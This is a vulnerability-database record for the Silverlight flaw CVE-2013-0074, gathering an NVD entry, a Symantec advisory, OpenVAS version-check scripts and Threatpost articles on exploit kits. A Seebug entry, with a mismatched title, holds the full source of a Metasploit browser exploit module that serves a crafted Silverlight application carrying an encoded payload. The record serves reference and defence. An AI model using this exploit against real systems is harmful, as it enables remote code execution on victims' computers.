{"cve": [{"lastseen": "2018-11-01T05:14:08", "bulletinFamily": "NVD", "description": "Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka \"Silverlight Double Dereference Vulnerability.\"", "modified": "2018-10-30T12:27:21", "published": "2013-03-12T20:55:01", "id": "CVE-2013-0074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074", "title": "CVE-2013-0074", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-14T22:39:14", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Silverlight is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the currently logged-in user. Failed exploit attempts will likely result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Silverlight 5.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Do not follow links provided by unknown or untrusted sources.** \nAttackers could exploit this vulnerability by enticing a user to visit a malicious website. 
Do not follow links provided by sources of questionable integrity.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisable support for script code and active content within a client browser to reduce the chances of a successful exploit. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-03-12T00:00:00", "published": "2013-03-12T00:00:00", "id": "SMNTC-58327", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58327", "type": "symantec", "title": "Microsoft Silverlight Double Dereference CVE-2013-0074 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:42:17", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2018-10-12T00:00:00", "published": "2013-03-13T00:00:00", "id": "OPENVAS:1361412562310902954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902954", "title": "Microsoft Silverlight Remote Code Execution Vulnerability (2814124)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\n#\n# Authors:\n# 
Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902954\");\n script_version(\"$Revision: 11865 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:18:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52547\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2814124\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"gb_ms_silverlight_detect.nasl\");\n 
script_mandatory_keys(\"Microsoft/Silverlight/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5\");\n script_tag(name:\"insight\", value:\"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n install the hotfixes from the referenced advisory.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( vers !~ \"^5\\.\" ) exit( 99 );\n\nif( version_in_range( version:vers, test_version:\"5.0\", test_version2:\"5.1.20124.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, vulnerable_range:\"5.0 - 5.1.20124.0\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:38:06", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2017-12-20T00:00:00", "published": "2013-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902954", "id": "OPENVAS:902954", "title": "Microsoft Silverlight Remote Code Execution Vulnerability (2814124)", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022.nasl 8190 2017-12-20 09:44:30Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Silverlight version 5\";\ntag_insight = \"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-022\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\";\n\nif(description)\n{\n script_id(902954);\n script_version(\"$Revision: 8190 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n 
script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 10:44:30 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:18:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52547\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2814124\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_silverlight_detect.nasl\");\n script_mandatory_keys(\"Microsoft/Silverlight/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( vers !~ \"^5\\.\" ) exit( 99 );\n\nif( version_in_range( version:vers, test_version:\"5.0\", test_version2:\"5.1.20124.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, vulnerable_range:\"5.0 - 5.1.20124.0\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:41:44", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2018-10-12T00:00:00", "published": "2013-03-13T00:00:00", "id": "OPENVAS:1361412562310902955", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902955", "title": "Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902955\");\n script_version(\"$Revision: 11865 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:40:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52547\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2814124\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5 on Mac OS X\");\n script_tag(name:\"insight\", value:\"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\");\n script_tag(name:\"solution\", value:\"Install the patch\");\n script_tag(name:\"summary\", value:\"This host is missing a critical 
security update according to\n Microsoft Bulletin MS13-022.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\n\nif(!slightVer || !(slightVer =~ \"^5\\.\")){\n exit(0);\n}\n\nif(version_in_range(version:slightVer, test_version:\"5.0\", test_version2:\"5.1.20124.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:11:02", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2016-11-18T00:00:00", "published": "2013-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902955", "id": "OPENVAS:902955", "title": "Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022_macosx.nasl 4570 2016-11-18 10:17:05Z antu123 $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Silverlight version 5 on Mac OS X\";\ntag_insight = \"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\";\ntag_solution = \"Install the patch from below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-022\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\";\n\nif(description)\n{\n script_id(902955);\n script_version(\"$Revision: 4570 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 11:17:05 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:40:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52547\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2814124\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n 
script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nslightVer = \"\";\n\n## Get the version from KB\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\n\nif(!slightVer || !(slightVer =~ \"^5\\.\")){\n exit(0);\n}\n\nif(version_in_range(version:slightVer, test_version:\"5.0\", test_version2:\"5.1.20124.0\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:14:04", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83333", "id": "SSV:83333", "title": "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "type": "seebug", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" />\r\n 
</Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Mar 12 2013",\r\n 'DefaultTarget' => 0))\r\n\r\n 
end\r\n\r\n def setup\r\n @xap_name = "#{rand_text_alpha(5 + rand(5))}.xap"\r\n @dll_name = "#{rand_text_alpha(5 + rand(5))}.dll"\r\n File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = "\\x90" + my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type="text/css">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id="form1" runat="server" >\r\n <div id="silverlightControlHost">\r\n <object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">\r\n <param name="source" value="<%= @xap_name %>"/>\r\n <param name="background" value="white" />\r\n <param name="InitParams" value="payload=<%= my_payload %>" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status("request: #{request.uri}")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status("Sending XAP...")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n 
print_status("Sending DLL...")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status("Sending XAML...")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status("Sending HTML...")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83333"}], "threatpost": [{"lastseen": "2018-10-06T22:59:45", "bulletinFamily": "info", "description": "When authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the alleged creator of the Blackhole exploit kit, last month, security researchers and watchers of the malware underground predicted that taking him off the board would put a dent in the use of Blackhole and force its customers onto other platforms. Six weeks later, it now appears that Blackhole is almost gone and the [Cool exploit kit](<http://threatpost.com/old-ie-attack-finds-its-way-into-cool-exploit-kit/100330>), another alleged creation of Paunch, has essentially disappeared, as well.\n\nThe Cool exploit kit isn\u2019t as well-known as Blackhole, but it is just as dangerous and was being sold at a much higher price during its heyday. Blackhole is one of the more venerable exploit kits for sale on the underground markets and it has been very popular with a variety of attackers and malware gangs over the years. It\u2019s often used in drive-by download scenarios to compromise users\u2019 machines through the use of browser exploits or exploits for plug-ins such as Java or Flash. Blackhole customers could buy a yearly license for about $1,500 or even just rent it for a day for $50. 
Cool could rent for as much as $10,000 a month.\n\nA malware researcher who uses the name [Kafeine](<http://malware.dontneedcoffee.com/2013/10/paunch-arrestationthe-end-of-era.html>) and closely follows the sale and use of exploit kits has looked at the major groups that have been using Cool and Blackhole in recent years and found that Cool is virtually gone from the exploit kit landscape. The only crew still using Cool is the [Reveton](<http://threatpost.com/reveton-ransomeware-adds-password-purloining-function/100712>) gang, which Kafeine said was the first major customer for the exploit kit, and has been using it for more than a year to push their ransomware. Reveton has taken many forms in its lifetime, showing up as fake FBI or Justice Department warnings about illegal content on a user\u2019s machine.\n\nThe Reveton gang is still using Cool, but it\u2019s not the main version of the kit. Like many of the other exploit kits, there are so-called private versions of Cool available for sale to premium customers at premium prices. They often will include private zero day vulnerabilities not available to other users and extra features. Kafeine said via email that the Reveton crew is using its own version of Cool these days.\n\n\u201cCool has disappeared with Paunch. Main user (reveton Team) is now on a \u2018private\u2019 EK that we decided to name Angler EK,\u201d Kafeine said.\n\nThe [Angler exploit kit](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>) was the first to add the [Microsoft Silverlight vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>) CVE-2013-0074. 
As for Blackhole, there are still a handful of attack groups using it, but Kafeine said that he has seen about a 98 percent drop in the usage of that exploit kit since the arrest of Paunch.\n\n\u201c[Blackhole] is almost dead,\u201d he said.\n\nThe one main group that\u2019s using Blackhole is known as /closest/ and has been pushing out LinkedIn spam with malicious links to pages that deliver the exploits. The crew is using Blackhole for a variety of purposes, including pushing the Cutwail bot, some pay-per-click malware and other threats.\n\nImage from Flickr photos of [NASA Goddard Space Flight Center](<http://www.flickr.com/photos/gsfc/>).\n", "modified": "2013-12-02T18:18:34", "published": "2013-11-26T11:19:11", "id": "THREATPOST:4092394DCBD8AD236C5B4A45CBC114AB", "href": "https://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034/", "type": "threatpost", "title": "Blackhole and Cool Exploit Kits Nearly Extinct", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:47", "bulletinFamily": "info", "description": "Developers behind the Angler Exploit Kit have apparently added a new exploit over the last week that leverages a known vulnerability in Microsoft\u2019s Silverlight browser framework.\n\nSilverlight, similar to Adobe Flash, is Microsoft\u2019s plug-in for streaming media on browsers and is perhaps most known for being used in Netflix\u2019s streaming video service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/11/07025333/chris_wakelin.jpg>)\n\nBritish-based security researcher Chris Wakelin discovered the Silverlight exploit last week and posted about it on Twitter via his @EKWatcher handle. 
From there an independent security researcher that goes by the name Kafeine picked it up, investigated Angler EK and described his findings on his blog [Malware Don\u2019t Need Coffee](<http://malware.dontneedcoffee.com/2013/11/cve-2013-0074-silverlight-integrates.html>).\n\nAccording to Kafeine the exploit kit usually checks to see if the system it\u2019s deployed on has Java or Flash but can now check to see if has Silverlight installed. If it can\u2019t exploit Java or Flash it delivers a remote control exploit ([CVE-2013-0074](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>)) that targets Silverlight 5. The vulnerability was patched [in March](<http://technet.microsoft.com/en-us/security/bulletin/ms13-022>) but users running Silverlight who haven\u2019t yet patched the critical vulnerability are still at risk and would be best served to update their software.\n\nAngler EK surfaced last month following [the arrest](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>) of the Blackhole Exploit Kit\u2019s creator Paunch in Russia. According to Kafeine, the same team behind the more souped-up [Cool Exploit Kit](<http://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/77386>), who also had ties to Blackhole, helped develop Angler and are also behind the popular Reveton ransomware.\n\nNetflix has 40 million global subscribers that could potentially be vulnerable to the exploit since the service principally uses Silverlight for streaming media. 
The video streaming company has been making strides to ditch Silverlight for HTML5 over the past few months and while it introduced HTML5-support in Windows 8.1 and Internet Explorer 11 over the summer, the technology hasn\u2019t been completely fleshed out yet on most browsers.\n", "modified": "2013-11-21T15:18:17", "published": "2013-11-19T15:24:15", "id": "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "href": "https://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968/", "type": "threatpost", "title": "Exploit Kit Adds Vector for Silverlight Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:08", "bulletinFamily": "info", "description": "[](<https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/>)For the second month in a row, Microsoft has released a cumulative update for Internet Explorer, patching a number of critical remote code execution vulnerabilities in the browser, including one previously disclosed. It also patched a serious kernel mode driver vulnerability that could enable attackers to gain root access to a machine using a malicious USB drive, a la Stuxnet.\n\nMicrosoft\u2019s Patch Tuesday security updates include four critical bulletins among the seven released today. Microsoft also released its policy on providing patches for Windows Store 